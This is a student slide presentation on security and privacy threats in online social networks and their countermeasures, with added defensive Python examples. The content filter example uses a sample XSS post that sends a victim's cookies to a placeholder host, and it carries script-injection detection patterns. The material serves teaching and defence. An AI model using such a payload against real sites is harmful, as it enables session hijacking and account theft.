The document discusses various threats faced by users of online social networks and solutions to address those threats. It categorizes threats into classic threats like malware, phishing and spam; modern threats unique to social networks like clickjacking, de-anonymization attacks and fake profiles; combination threats; and threats targeting children. It then provides taxonomies of solutions developed by social network operators, commercial companies and academics to mitigate these threats through methods like authentication mechanisms, privacy settings, internal protection systems and user reporting features.
A Survey of Security & Privacy in Online Social Networks (OSN) with regards t...
Frances Coronel
Published December 14, 2015, in Social media
Research Presentation on Online Social Networks (OSN) Privacy.
CSC 425
Senior Seminar
Hampton University
Fall 2015
---
FVCproductions
https://fvcproductions.com
2. INDEX
• ONLINE SOCIAL NETWORKS (OSN)
• THREATS IN OSN AND ITS TAXONOMY
• ONLINE SOCIAL NETWORK THREATS SOLUTIONS TAXONOMY
• USER ORIENTED SOLUTIONS TAXONOMY
• IMPORTANCE OF ACCESS CONTROL SOLUTIONS
• ACCESS CONTROL SOLUTIONS
• REFERENCES
3. Online Social Networks[1]
• A social network (SN) is a set of people connected to each other by social relationships.
• Offline Social Networks refer to real-world social communities.
• Online Social Networks (OSNs) are web-based services that offer the functionality of creating a personal representation of one’s self through which one can socialize with others.
• A main feature of OSNs is the articulation of various types of relationships between profiles to facilitate social communication with others.
• The social communication includes various activities such as sharing objects, creating groups, organizing online and offline events, etc.
• For example Facebook, Twitter, Foursquare, LinkedIn, etc.
5. Classic Threats[1]
• Often referred to as malware, spam, cross-site scripting (XSS) attacks, or phishing, they continue to be an ongoing issue.
• Classic threats take advantage of a user’s personal information published in a social network to attack not only the user but also their friends, simply by adjusting the threat to accommodate the user’s personal information.
6. Contd.
• For example, in many cases these threats target essential and everyday user resources such as credit card numbers, account passwords, computing power, and even computer bandwidth (in order to send spam emails).
7. Types of Classic Threats[1]
• I. Malware: Malware is malicious software developed to disrupt a computer operation in order to collect a user’s credentials and gain access to his or her private information.
For example: Koobface was the first malware to successfully propagate through OSNs such as Facebook, MySpace, and Twitter. Koobface attempts to collect login information and to join the infected computer to a botnet, a so-called “zombie army” of computers.
9. Control and sustainability for malware
Methods and descriptions:
- Command-and-control: Command-and-control botnets are managed by a single central controller, often a purpose-built botnet control console such as Zunker, WebAttacker, MPack, or IcePack.
- Drive-by attacks: Cybercriminals use a couple of different drive-by attack mechanisms. In one, a bogus website scans a site visitor’s system for specific vulnerabilities.
- HTTP: Here the attackers hide their command-and-control messages to zombie armies inside innocent web communications protocols.
- Internet relay chat (IRC): This mature communications protocol from early network bulletin boards lets anyone hold live keyboard conversations with other computers.
10. Contd.
- Peer-to-peer: A botnet fault-tolerant strategy; peer-to-peer botnets ignore the loss of any controller and continue operating standalone until a new manager emerges.
- Pull propagation: A classic bot attack “pushes” spam with a special offer or lure containing a malicious payload.
- Zero-day exploit: A zero-day exploit refers to the release of code whose purpose is to exploit a just-published or unpublished vulnerability within an OS.
- Zero-day window of opportunity: The zero-day window refers to the time between the announcement of a vulnerability and the release and installation of its associated patch.
11. Contd.
• II. Phishing Attacks: Phishing attacks are a form of social engineering to acquire user-sensitive and private information by impersonating a trustworthy third party.
12. Contd. [1]
• III. Spammers: Spammers are users who use electronic messaging systems in order to send unwanted messages, like advertisements, to other users.
An example of the prevalence of network spamming can be found on Twitter, which has suffered from a massive amount of spam: in August 2009, 11% of Twitter messages were spam messages. Nevertheless, a 2013 article states, “Social spam, as it already exists on Twitter, will continue to grow and unless the company addresses the problem quickly, it may be the one thing that sinks it.”
13. Contd.[1]
• IV. Cross-Site Scripting (XSS): An XSS attack is an assault against web applications.
• The attacker who uses XSS exploits the trust of the web client in the web application and causes the web client to run malicious code capable of collecting sensitive information.
For example, an XSS worm called Mikeyy rapidly transmitted automated tweets across Twitter and infected many users. The Mikeyy worm used an XSS weakness and the Twitter network structure to spread through Twitter user profiles.
14. Contd.[1]
• V. Internet Fraud: Internet fraud, also known as cyber fraud, refers to using Internet access to scam or take advantage of people.
For example, fraudsters have been hacking into the accounts of Facebook users who travel abroad. Once they manage to log into a user’s account, the scammers cunningly ask the user’s friends for assistance in transferring money to the scammer’s bank account.
15. Modern Threats[1]
• Modern threats are typically unique to OSN environments.
• Usually these threats specifically target users’ personal information as well as the personal information of their friends.
For example, an attacker who is trying to gain access to a Facebook user’s high school name (viewable only by the user’s Facebook friends) can create a fake profile with pertinent details and initiate a friend request to the targeted user. If the user accepts the friend request, his or her details will be exposed to the attacker. Alternatively, the attacker can collect data from the user’s Facebook friends and employ an inference attack to infer the high school name from the data collected from the user’s friends.
16. Types of Modern Threats[1]
• I. Clickjacking: Clickjacking is a malicious technique which tricks users into clicking on something different from what they intended to click.
An example of a clickjacking attack occurred on Twitter in 2009 when Twitter was plagued by a “Don’t Click” attack. The attacker tweeted a link with the message “Don’t Click” along with a masked URL (the actual URL domain was hidden). When Twitter users clicked on the “Don’t Click” message, the message automatically spread virally and was posted onto their Twitter accounts.
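Added example, not from the survey or from Twitter's own defences: clickjacking depends on the victim page being loadable inside an attacker-controlled frame, so the defender-side check below reads a response's headers and decides whether a given origin could frame the page. It models CSP frame-ancestors (which overrides X-Frame-Options) and the DENY/SAMEORIGIN forms of X-Frame-Options in simplified form; all URLs and header values are constructed.

```python
from urllib.parse import urlsplit


def _frame_ancestors(csp):
    """Return the frame-ancestors source list from a CSP header value, or
    None if the directive is absent. Quotes around keywords ('self') drop."""
    for directive in csp.split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.strip("'").lower() for t in tokens[1:]]
    return None


def _source_matches(source, embedder, page):
    """Simplified CSP source matching, enough for frame-ancestors:
    'none', 'self', '*', a bare scheme (https:), a host, a *.wildcard host,
    optionally with scheme and port."""
    emb, pg = urlsplit(embedder), urlsplit(page)
    if source == "none":
        return False
    if source == "self":
        return (emb.scheme, emb.netloc) == (pg.scheme, pg.netloc)
    if source == "*":
        return True
    if source.endswith(":") and "/" not in source:  # scheme source
        return emb.scheme == source[:-1]
    src = urlsplit(source if "://" in source else "//" + source)
    if src.scheme:
        if emb.scheme != src.scheme:
            return False
    elif emb.scheme not in (pg.scheme, "https"):
        # A host source without a scheme matches the page's scheme or https.
        return False
    if src.port is not None and src.port != emb.port:
        return False
    host, ehost = src.hostname or "", emb.hostname or ""
    if host.startswith("*."):
        return ehost.endswith(host[1:])
    return host == ehost


def framing_allowed(headers, page_url, embedder_url):
    """Would a browser honouring these response headers let page_url be
    framed by embedder_url? A frame-ancestors directive, when present,
    overrides X-Frame-Options. The obsolete ALLOW-FROM form is ignored by
    current browsers, so it is treated as no protection at all."""
    lowered = {k.lower(): v for k, v in headers.items()}
    csp = lowered.get("content-security-policy", "")
    sources = _frame_ancestors(csp) if csp else None
    if sources is not None:
        return any(_source_matches(s, embedder_url, page_url) for s in sources)
    xfo = lowered.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        pg, emb = urlsplit(page_url), urlsplit(embedder_url)
        return (pg.scheme, pg.netloc) == (emb.scheme, emb.netloc)
    return True  # nothing stops an arbitrary site from framing the page


def clickjacking_exposed(headers, page_url, untrusted_origin="https://attacker.invalid"):
    """Defender's one-liner: True when a third-party origin (placeholder
    .invalid domain) could frame the page, i.e. protection is missing."""
    return framing_allowed(headers, page_url, untrusted_origin)


if __name__ == "__main__":
    # Constructed header sets for a hypothetical OSN settings page.
    page = "https://osn.example/settings"
    for name, hdrs in {
        "no headers": {},
        "XFO DENY": {"X-Frame-Options": "DENY"},
        "CSP partners": {"Content-Security-Policy":
                         "frame-ancestors 'self' https://*.partner.example"},
    }.items():
        print(f"{name:12s} exposed={clickjacking_exposed(hdrs, page)}")
```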
17. Contd. [1]
• II. De-Anonymization Attacks: These attacks use techniques such as tracking cookies, network topology, and user group memberships to uncover the user’s real identity.
The most recent example was presented by Peled et al., who introduced a method for matching user profiles across several OSNs. The method was evaluated by matching profiles across Facebook and Xing.
18. Contd.[1]
• III. Face Recognition: Many people use OSNs for uploading pictures of themselves and their friends. Millions and millions of photos are uploaded to Facebook each day.
19. Survey Results
Experiments, types and observations:
- Experiment 1, online to online: image datasets by using publicly accessible
- Experiment 2, offline to online: image datasets can also be matched, namely they used publicly available images
- Experiment 3: personal and sensitive information from a face; an individual’s interests, activities, and even his or her social security number could be automatically predicted by matching the face image with the person’s Facebook image to obtain the person’s full name.
20. Contd.
• IV. Fake Profiles: Fake profiles (also referred to as sybils or socialbots) are automatic or semi-automatic profiles that mimic human behaviours in OSNs.
• These can be used to harvest users’ personal data from social networks.
For example: in one of the surveyed studies, an army of more than 100 Facebook socialbots was created which attempted to infiltrate innocent Facebook profiles by initiating a series of friend requests. The socialbot army succeeded in generating approximately 250 GB of inbound Facebook traffic.
21. Contd.
• V. Identity Clone Attacks: The attackers duplicate a user’s online presence, either in the same network or across different networks, to deceive the cloned user’s friends into forming a trusting relationship with the cloned profile.
An example of an identity clone attack occurred with NATO’s most senior commander, Admiral James Stavridis, where his profile details were cloned and then used to collect data on defence ministry officials.
22. Contd.
• VI. Inference Attacks: These are used to predict a user’s personal, sensitive information that the user has not chosen to disclose, such as religious affiliation or sexual orientation.
An inference attack was demonstrated by Mislove et al., who presented techniques for predicting a user’s attributes based on other users’ attributes in the OSN; they tested their techniques and inferred different Facebook users’ attributes, such as educational, geographical, and personal information.
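Added example, not from the survey or from Mislove et al.: a Python model of the friends'-attributes inference on a constructed six-user graph, where each friend chooses who may see their high-school field. It shows how much a stranger versus a friend can infer about a user who hides the field, and what happens when some friends tighten their own settings (the mitigation the privacy-settings section later describes). The names, the graph and the three-level visibility model are all assumptions.

```python
from collections import Counter

# Constructed sample data (not from the survey): friendship graph, each
# user's high-school field, and the audience that field is shared with.
FRIENDS = {
    "alice": {"bob", "carol", "dave", "erin"},
    "bob":   {"alice", "carol", "frank"},
    "carol": {"alice", "bob", "dave"},
    "dave":  {"alice", "carol", "erin"},
    "erin":  {"alice", "dave"},
    "frank": {"bob"},
}
PROFILES = {
    # alice is the target: she keeps the field to herself.
    "alice": {"high_school": "Lincoln High",   "visibility": "only_me"},
    "bob":   {"high_school": "Lincoln High",   "visibility": "public"},
    "carol": {"high_school": "Lincoln High",   "visibility": "public"},
    "dave":  {"high_school": "Lincoln High",   "visibility": "friends"},
    "erin":  {"high_school": "Westside High",  "visibility": "public"},
    "frank": {"high_school": "Northgate High", "visibility": "public"},
}


def visible_to(viewer, owner, profiles, friends):
    """The owner's high_school value if the viewer may read it, else None."""
    setting = profiles[owner]["visibility"]
    if viewer == owner or setting == "public":
        return profiles[owner]["high_school"]
    if setting == "friends" and viewer in friends.get(owner, set()):
        return profiles[owner]["high_school"]
    return None


def infer_attribute(viewer, target, profiles, friends, min_votes=2, min_share=0.5):
    """Majority-vote inference over the target's friends whose field the
    viewer can read. Returns (guess or None, share of readable friends that
    agree). min_votes stops a single readable friend from producing a
    confident but baseless guess."""
    votes = Counter()
    for friend in friends.get(target, set()):
        value = visible_to(viewer, friend, profiles, friends)
        if value is not None:
            votes[value] += 1
    total = sum(votes.values())
    if total < min_votes:
        return None, 0.0
    guess, count = votes.most_common(1)[0]
    share = count / total
    return (guess if share >= min_share else None), share


def restrict(profiles, users, setting):
    """Copy of profiles in which the given users switch their field to
    `setting`; used to see how friends' choices change the inference."""
    out = {u: dict(p) for u, p in profiles.items()}
    for u in users:
        out[u]["visibility"] = setting
    return out


if __name__ == "__main__":
    print("stranger:", infer_attribute("mallory", "alice", PROFILES, FRIENDS))
    print("friend carol:", infer_attribute("carol", "alice", PROFILES, FRIENDS))
    tightened = restrict(PROFILES, ["bob", "carol"], "friends")
    print("stranger after bob/carol go friends-only:",
          infer_attribute("mallory", "alice", tightened, FRIENDS))
    print("carol after bob/carol go friends-only:",
          infer_attribute("carol", "alice", tightened, FRIENDS))
```

The target's own setting is irrelevant to the outcome: the field leaks through the friends who publish theirs, which is why the inference must be mitigated on the friends' side or by the operator.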
23. Contd.[1]
• VII. Information Leakage: Users willingly share sensitive information about themselves and other people, such as health related information and sobriety status.
For example, insurance companies may use OSN data to identify risky clients: these companies can use leaked OSN information to detect clients with medical conditions, consequently increasing their premiums or denying coverage.
24. Information leakage in OSN[2]
Table: OSN functions and potential problems to organisations [2]
25. Factors responsible for information leakages
• The Decomposed Theory of Planned Behaviour, an extension of the Theory of Planned Behaviour, comprises the following factors for information scanning and leakages:
• Attitude towards OSN use
• Social Influence
• Perceived Behavioural Control
• One existing example is APT (Advanced Persistent Threats)
26. Control measures for Prevention
• Information Security Policy (ISP)
• Security Education, Training and Awareness
• Preventive Security Systems
27. Contd.[1]
• VIII. Location Leakage: Many people use OSNs to willingly share private and sometimes sensitive information about their (or their friends’) current or future whereabouts.
One example of location leakage threats is given by the website Pleaserobme.com, which shows a way to find the location information of specific Twitter and Foursquare users.
28. Contd.[1]
• IX. Socware: Socware entails fake and possibly damaging posts and messages from friends in OSNs.
• Socware may lure victims by offering false rewards to users who install socware-related malicious Facebook applications or visit questionable socware websites.
For example: in 2012, Rahman et al. investigated over 40 million posts and discovered that 49% of the studied users were exposed to at least one socware post in a four-month period.
29. Working of socware
Figure: socware works through two mechanisms, a propagation mechanism and an exploitation mechanism; a socware post consists of URLs and typically contains a catchy text message.
30. How does socware work?
(a) Application installation process on Facebook
32. Prevention techniques
• Socware was identified and detected through MyPageKeeper, which is an application.
• Following are the basic components on which this application works:
- User authorization module
- Crawling module
- Feature extraction module
- Classification module
- Notification module
- User feedback module
33. Combination Threats [1]
For example, an attacker can use a phishing attack to collect a targeted user’s Facebook password and then post a message containing a clickjacking attack on the targeted user’s timeline, thus luring the user’s Facebook friends to click on the posted message and install a hidden virus onto their own computers.
Figure: classic threats, modern threats, and combination threats (their overlap).
34. Threats Targeting Children
• Due to the critical nature of this topic, this section highlights those threats and describes specific findings from current studies.
35. Types of Threats Targeting Children[1]
• Online Predators: The greatest concern regarding the personal information safety of children relates to Internet pedophiles, also referred to as online predators.
Types of harm and their categorization:
- Harm from content: a child’s exposure to pornography or harmful sexual content
- Harm from contact: a child who is contacted by an adult or another child for the purpose of sexual abuse
- Harm from conduct: the child as an active initiator of abusive or risky behaviours
36. Contd.
• Risky Behaviours: Potential risky behaviours of children may include direct online communication with strangers, use of chat rooms for interactions with strangers, sexually explicit talk with strangers, and giving private information and photos to strangers.
Researchers contend that victims of Internet abuse are very often vulnerable children, such as youths with a history of physical or sexual abuse or those who suffer from depression or social interaction problems.
37. Contd.
• Cyberbullying: Cyberbullying (also referred to as cyber abuse) is bullying that takes place within technological communication platforms, emails, chats, phone conversations, and OSNs, by an attacker.
38. Threats to Online Social Networks Users
Taxonomy of Online Threats [1]
Classic threats: Malware; Phishing attacks; Spammers; Cross-site scripting (XSS); Internet fraud
Modern threats: Clickjacking; De-anonymization attacks; Face recognition; Fake profiles (socialbots); Identity clone attacks; Inference attacks; Information leakage; Location leakage; Socware
Combination threats: Combination of clickjacking and phishing attacks
Threats targeting children: Online predators; Risky behaviours; Cyberbullying
40. User Threats Solutions
Solutions to some crucial threats, grouped by who provides them:
Operator solutions: Authentication mechanisms; Security and privacy settings; Internal protection mechanisms; Report users
Commercial solutions: MinorMonitor; Defensio; MyPermissions; FB Phishing Protector
Academic solutions: Preventing information and location leakage; Cloned profile detection
41. Operator Solutions Taxonomy[1]
• OSN operators attempt to protect their users by activating safety measures,
such as employing user authentication mechanisms and applying user privacy
settings. Several of these techniques are described in detail below.
42. I. Authentication Mechanisms [1]
• OSN operators use authentication mechanisms such as CAPTCHA, photos-of-friends
identification and multi-factor authentication, and in some cases they even
request that the user send a copy of his or her government-issued ID.
44. II. Security and Privacy Settings[1]
• Many OSNs support various configurable user privacy settings that enable
users to protect their personal data from other users or applications.
45. Procedural Approach [5]
Stage 1, Survey of privacy attitude: survey the participant's privacy attitudes and their experience with Facebook.
Stage 2, Collection of intentions: gather the participant's sharing intentions for each profile group per information category, using a table of information categories and profile groups.
Stage 3, Identification of potential violations: examine the participant's Facebook data to identify potential violations based on the intentions stated in Stage 2.
Stage 4, Confirmation of violations: present the participant with their potential violations, let them confirm the actual violations, and survey their intent to act on them.
47. III. Internal Protection Mechanisms[1]
• Several OSNs protect their users by implementing additional internal
protection mechanisms for defence against spammers, fake profiles, scams,
and other threats.
• Facebook, for example, protects its users from malicious attacks and
information collecting by activating the Facebook Immune System (FIS).
• The FIS is described as an adversarial learning system that performs real-
time checks and classifications on read-and-write actions on Facebook’s
database.
48. IV. Report Users
Procedure (the example here is the Scratch community's reporting flow):
• To report a user, go to their user page and click the Report this User
button below the What I've Been Doing section.
• Once you have selected what you are reporting, you can either press Send
to send the report to the Scratch Team or press Cancel to cancel the report.
When should a user be reported?
If his/her username is inappropriate
If he/she has an inappropriate icon or inappropriate text in the description fields
If the user is impersonating another user
49. Commercial solutions Taxonomy[1]
• Various commercial companies have expanded their traditional Internet
security options and now offer software solutions specifically for OSN users
to better protect themselves against threats.
50. I. FB Phishing Protector
• FB Phishing Protector is a Firefox add-on which warns Facebook users
when suspicious activity is detected, such as a script-injection attempt.
• The add-on provides protection against various phishing attacks.
• It works by detecting and blocking cross-site scripting (XSS) injection in
Facebook content.
51. II. Mypermissions
• Online Permissions Technologies’ MyPermissions is a web service that
provides its users with convenient links to the permissions pages for many
OSNs, such as Facebook, Twitter, and LinkedIn.
• These links help users view and revoke the permissions they have given in
the past to various applications, thus better protecting their privacy.
53. III. Defensio
• Websense's Defensio web service helps protect social network users from threats such as links to
malware posted on the user's Facebook page.
• The Defensio service also helps prevent information leakage by controlling the user's published
content: it can remove certain words from posts or filter specific comments.
• Defensio detects malicious content such as:
Spam content
Attempts to distribute malware
Links to undesirable content categories (e.g., adult material, gambling, etc.)
Links to executable files
The inclusion of JavaScript or VBScript
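The two commercial tools above share one mechanism: inspect content before it reaches the wall, flag script injection, malicious or executable links and spam, and optionally strip words the user does not want published. The Python below is an added example of such a content filter covering both the FB Phishing Protector passage (script injection) and the Defensio list (spam, malware links, undesirable categories, executable links, JavaScript/VBScript). It is not the code of either product; the host lists, spam phrases, blocked words and sample posts are constructed, and the script-injection regex is a deliberately small one that catches `<script>`, `javascript:`/`vbscript:` URIs and inline `on*=` handlers.

```python
import re
from urllib.parse import urlparse

# Assumed configuration (constructed, not Defensio's or the add-on's actual lists).
EXECUTABLE_EXT = (".exe", ".scr", ".bat", ".cmd", ".msi", ".js", ".vbs", ".jar")
UNDESIRABLE_HOSTS = {"casino.example": "gambling", "adult.example": "adult"}
KNOWN_MALWARE_HOSTS = {"malware.example"}
SPAM_PHRASES = ("free iphone", "work from home", "click here to claim")
BLOCKED_WORDS = ("passw0rd-hint",)   # words the user configured to be stripped from published content

# <script ...>, javascript:/vbscript: URIs, and inline event handlers such as onerror=
SCRIPT_RE = re.compile(r"<\s*script\b|javascript\s*:|vbscript\s*:|\bon[a-z]+\s*=", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)


def inspect(content):
    """Return the list of findings for one post or comment; an empty list means clean."""
    findings = []
    if SCRIPT_RE.search(content):
        findings.append("script_injection")
    lowered = content.lower()
    if any(p in lowered for p in SPAM_PHRASES):
        findings.append("spam")
    for url in URL_RE.findall(content):
        parsed = urlparse(url)
        host = parsed.netloc.lower()
        path = parsed.path.lower()
        if host in KNOWN_MALWARE_HOSTS:
            findings.append("malware_link")
        if host in UNDESIRABLE_HOSTS:
            findings.append("undesirable:" + UNDESIRABLE_HOSTS[host])
        if path.endswith(EXECUTABLE_EXT):
            findings.append("executable_link")
    return findings


def sanitize(content):
    """Information-leakage control: replace configured words, leave everything else untouched."""
    out = content
    for w in BLOCKED_WORDS:
        out = re.sub(re.escape(w), "[removed]", out, flags=re.IGNORECASE)
    return out


def moderate(content):
    """Block when any finding is present; otherwise publish the sanitized text."""
    findings = inspect(content)
    if findings:
        return {"action": "block", "findings": findings, "content": None}
    return {"action": "publish", "findings": [], "content": sanitize(content)}


if __name__ == "__main__":
    # Constructed sample posts.
    for post in (
        "<script>document.location='http://evil.example/?c='+document.cookie</script>",
        "Check this out http://malware.example/setup.exe",
        "Free iPhone for everyone! http://casino.example/spin",
        "Lunch at noon, my passw0rd-hint is cat",
    ):
        print(moderate(post))
```

The filter is signature based, so it is only as good as its lists; the `on[a-z]+=` rule in particular is a blunt instrument that a real product would replace with an HTML parser, but it shows why "the inclusion of JavaScript" has to cover attributes and URI schemes, not just `<script>` tags.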
55. IV. MinorMonitor
• Infoglide’s MinorMonitor is a parental control web-service which gives
parents a quick dashboard view of their child’s Facebook activities and online
friends.
• By using MinorMonitor, parents can be informed about questionable
content that may have been revealed to their child, and they can identify
overage friends in their child’s Facebook friends list.
57. Academic solutions[1]
• These solutions have primarily focused on identifying malicious users and
applications.
• These academic solutions provide cutting-edge insight into dealing with
social network threats.
• They can be used by OSN operators to improve their users’ security and
privacy, by security companies to offer the customers better OSN protection,
or by early-adopter OSN users who want to better protect themselves.
58. I. Cloned Profile Detection
• A cloned profile can be used to send falsified messages in order to harm
the original user.
• The victimized user has no way of knowing that the fake profiles exist,
especially when they are created on a different social network.
Methodology [6]:
• Kontaxis et al. built a prototype that can be employed to investigate
whether or not users have fallen victim to clone attacks.
59. System design and its working [6]
Figure: Methodology to detect cloned profiles
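The figure is not recoverable here, so the Python below is an added sketch of the detection idea, not the prototype from [6]: distil the identifying fields from the legitimate profile, hunt for same-name profiles across networks, then score each candidate by how much of the original's identifying information it reproduces. The corpus, field weights, the `photo_hash` field (standing in for some comparison of profile pictures) and the 0.6 threshold are all assumptions.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Profile:
    network: str
    pid: str
    name: str
    location: str = ""
    education: str = ""
    employer: str = ""
    photo_hash: str = ""   # assumption: a hash or fingerprint of the profile picture


# Constructed corpus standing in for search results on two OSNs (not real profiles).
CORPUS = [
    Profile("osn-a", "1", "Jane Roe", "Lisbon", "Univ. of Lisbon", "Acme", "ph-7f3a"),   # legitimate profile
    Profile("osn-a", "2", "Jane Roe", "Porto", "", "", "ph-1111"),                        # namesake, different person
    Profile("osn-b", "9", "Jane Roe", "Lisbon", "Univ. of Lisbon", "Acme", "ph-7f3a"),   # cross-network clone
    Profile("osn-b", "10", "Jane Roe", "Lisbon", "", "Acme", "ph-2222"),                 # partial copy, borderline
    Profile("osn-b", "11", "John Doe", "Lisbon", "Univ. of Lisbon", "Acme", "ph-9999"),  # colleague, other name
]

# Assumed weights: fields that identify a person more strongly count for more.
FIELD_WEIGHTS = {"location": 1.0, "education": 1.5, "employer": 1.5, "photo_hash": 3.0}


def distill(profile):
    """Information distiller: the identifying fields the original profile actually fills in."""
    return {k: getattr(profile, k) for k in FIELD_WEIGHTS if getattr(profile, k)}


def hunt(original, corpus):
    """Profile hunter: candidates are other profiles with the same name, on any network."""
    return [p for p in corpus if p.name == original.name and p != original]


def similarity(original, candidate):
    """Profile verifier: weighted fraction of the original's identifying fields the candidate reproduces."""
    fields = distill(original)
    if not fields:
        return 0.0
    total = sum(FIELD_WEIGHTS[k] for k in fields)
    matched = sum(FIELD_WEIGHTS[k] for k, v in fields.items() if getattr(candidate, k) == v)
    return matched / total


def detect_clones(original, corpus, threshold=0.6):
    """(pid, network, score) for every same-name candidate whose similarity reaches the threshold."""
    hits = []
    for cand in hunt(original, corpus):
        s = similarity(original, cand)
        if s >= threshold:
            hits.append((cand.pid, cand.network, round(s, 2)))
    return hits


if __name__ == "__main__":
    print(detect_clones(CORPUS[0], CORPUS))
```

The borderline profile ("10") is the interesting case: it copies location and employer but not the picture, and whether it is reported depends entirely on the threshold, which is why the prototype in [6] reports a score to the user rather than a yes/no.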
61. Module wise working approach
• Mao et al. [7] describe a "guardian angel" service that can monitor users' tweets and alert
users to potential privacy violations.
The Classifier module is used to automatically detect sensitive tweets.
The Content Analysis module provides information about what private topics are revealed by
drunk- and disease-related tweets, which can also be used by the Classifier to select classification labels.
The system thus outputs, through the Classifier, a stream of sensitive tweets that leak private information.
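The Python below is an added example of the two modules working together, not the authors' system: a small multinomial Naive Bayes classifier (add-one smoothing, written out so nothing is hidden in a library) labels each tweet as drunk, disease or benign, and a content-analysis step reports which cue words in the tweet revealed the topic. The training tweets, the test stream and the cue-word lists are constructed; a real deployment would train on a labelled corpus and a far larger vocabulary.

```python
import math
import re
from collections import Counter, defaultdict

# Constructed training tweets (not the paper's data set), labelled by the private topic they reveal.
TRAIN = [
    ("so drunk right now cant find my keys lol", "drunk"),
    ("wasted after the party, drunk texting everyone", "drunk"),
    ("three beers in and already drunk", "drunk"),
    ("doctor says my flu is getting worse, stuck in bed", "disease"),
    ("diagnosed with diabetes today, starting insulin", "disease"),
    ("another migraine, taking my meds and going to bed", "disease"),
    ("great match tonight, what a goal", "benign"),
    ("new phone arrived, setting it up", "benign"),
    ("coffee with friends then a walk in the park", "benign"),
]

# Constructed stream the guardian angel watches.
SAMPLE_STREAM = [
    "got so drunk last night, hangover today",
    "back at the doctor, my flu turned into pneumonia",
    "new coffee place opened near the park",
]

TOKEN_RE = re.compile(r"[a-z']+")


def tokenize(text):
    return TOKEN_RE.findall(text.lower())


class NaiveBayes:
    """Classifier module: multinomial Naive Bayes with add-one smoothing."""

    def __init__(self):
        self.class_counts = Counter()
        self.word_counts = defaultdict(Counter)
        self.vocab = set()

    def train(self, samples):
        for text, label in samples:
            self.class_counts[label] += 1
            for tok in tokenize(text):
                self.word_counts[label][tok] += 1
                self.vocab.add(tok)
        return self

    def predict(self, text):
        tokens = tokenize(text)
        n_docs = sum(self.class_counts.values())
        best, best_lp = None, -math.inf
        for label, c in self.class_counts.items():
            lp = math.log(c / n_docs)                       # log prior
            total = sum(self.word_counts[label].values())
            for tok in tokens:                              # log likelihood, smoothed so unseen words do not zero it
                lp += math.log((self.word_counts[label][tok] + 1) / (total + len(self.vocab)))
            if lp > best_lp:
                best, best_lp = label, lp
        return best


# Content analysis stand-in: assumed cue words that explain what a flagged tweet reveals.
TOPIC_CUES = {
    "drunk": {"drunk", "wasted", "beers", "hangover"},
    "disease": {"flu", "diabetes", "migraine", "doctor", "meds", "insulin"},
}


def guardian_angel(stream, model):
    """Reduce a tweet stream to the sensitive tweets, each with its topic and the cue words found."""
    alerts = []
    for tweet in stream:
        label = model.predict(tweet)
        if label != "benign":
            cues = sorted(set(tokenize(tweet)) & TOPIC_CUES[label])
            alerts.append({"tweet": tweet, "topic": label, "cues": cues})
    return alerts


if __name__ == "__main__":
    for a in guardian_angel(SAMPLE_STREAM, NaiveBayes().train(TRAIN)):
        print(f"[{a['topic']}] {a['tweet']!r} (cues: {', '.join(a['cues'])})")
```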
62. Taxonomy of Access control solutions
Access control solutions: Operator solutions; Commercial solutions (MyPermissions, Defensio, MinorMonitor)
63. Importance of Access control [8]
• Online social networks (OSNs) have seen large growth in recent years and
have become a portal for hundreds of millions of Internet users.
• These OSNs offer attractive means for digital social interaction and
information sharing, but also raise a number of security and privacy issues.
• Although OSNs let users restrict access to the data they share, they currently
provide no mechanism for the case where shared data is associated with multiple users.
• Access control mechanisms have therefore become a prime need in order to secure
online social networking.
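The model in [8] expresses a policy as a pattern over user-to-user relationship types plus a hop limit, and evaluates it by looking for a qualifying relationship path between the two users. The Python below is an added illustration of that evaluation, not the authors' implementation. The relationship graph, the two-letter alphabet (f = friend, c = colleague), the choice to walk paths from the resource owner to the requester, and the use of a Python regular expression as the pattern language are all assumptions made for the example.

```python
import re
from collections import deque

# Constructed relationship graph: each edge is (relationship type, neighbour); f = friend, c = colleague.
GRAPH = {
    "alice": [("f", "bob"), ("c", "carol")],
    "bob":   [("f", "alice"), ("f", "dave")],
    "carol": [("c", "alice"), ("f", "erin")],
    "dave":  [("f", "bob"), ("f", "frank")],
    "erin":  [("f", "carol")],
    "frank": [("f", "dave")],
}

# Assumed policy shape: (regex over relationship types, hopcount).
POLICY_FRIENDS_OF_FRIENDS = ("f{1,2}", 2)   # friends and friends-of-friends, at most two hops


def relationship_paths(graph, start, target, hopcount):
    """All simple paths from start to target with at most `hopcount` edges, as strings of relationship types."""
    found = []
    queue = deque([(start, "", frozenset([start]))])   # (current user, path so far, visited users)
    while queue:
        user, path, visited = queue.popleft()
        if user == target and path:
            found.append(path)
            continue
        if len(path) >= hopcount:                        # hop limit bounds the search
            continue
        for rel, nxt in graph.get(user, []):
            if nxt not in visited:                       # simple paths only
                queue.append((nxt, path + rel, visited | {nxt}))
    return found


def authorize(graph, owner, requester, policy):
    """Grant access iff some relationship path from owner to requester, within the hop limit,
    fully matches the policy pattern."""
    pattern, hopcount = policy
    if owner == requester:
        return True
    regex = re.compile(pattern)
    return any(regex.fullmatch(p) for p in relationship_paths(graph, owner, requester, hopcount))


if __name__ == "__main__":
    for who in ("bob", "dave", "frank", "carol", "erin"):
        print(who, authorize(GRAPH, "alice", who, POLICY_FRIENDS_OF_FRIENDS))
```

Two things the example makes visible: the hop limit is part of the policy, so "f*" with hopcount 2 and "f*" with hopcount 3 are different policies; and path types matter, so a colleague's friend ("cf") is not a friend-of-friend ("ff") even though both are two hops away.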
66. COMPARATIVE ANALYSIS
Solutions versus the threats they address. Threats considered: information leakage, location leakage, socware, cyberbullying, Internet fraud, spammers, fake profiles, face recognition, identity clone attacks.
Information Security Policy (ISP), Security Education, Training and Awareness (SETA) and preventive security systems
Addresses: information leakage, location leakage, socware, cyberbullying, Internet fraud
Does not address: spammers, fake profiles, face recognition, identity clone attacks
MyPageKeeper application [3]
Addresses: information leakage, location leakage, socware, spammers
Does not address: cyberbullying, Internet fraud, fake profiles, face recognition, identity clone attacks
Photo-based social authentication, including node attributes and edge attributes [4]
Addresses: Internet fraud, fake profiles, face recognition, identity clone attacks
Does not address: information leakage, location leakage, socware, cyberbullying, spammers
Application and stage-wise approach
Addresses: fake profiles, face recognition
Does not address: information leakage, location leakage, socware, cyberbullying, Internet fraud, spammers, identity clone attacks
69. References
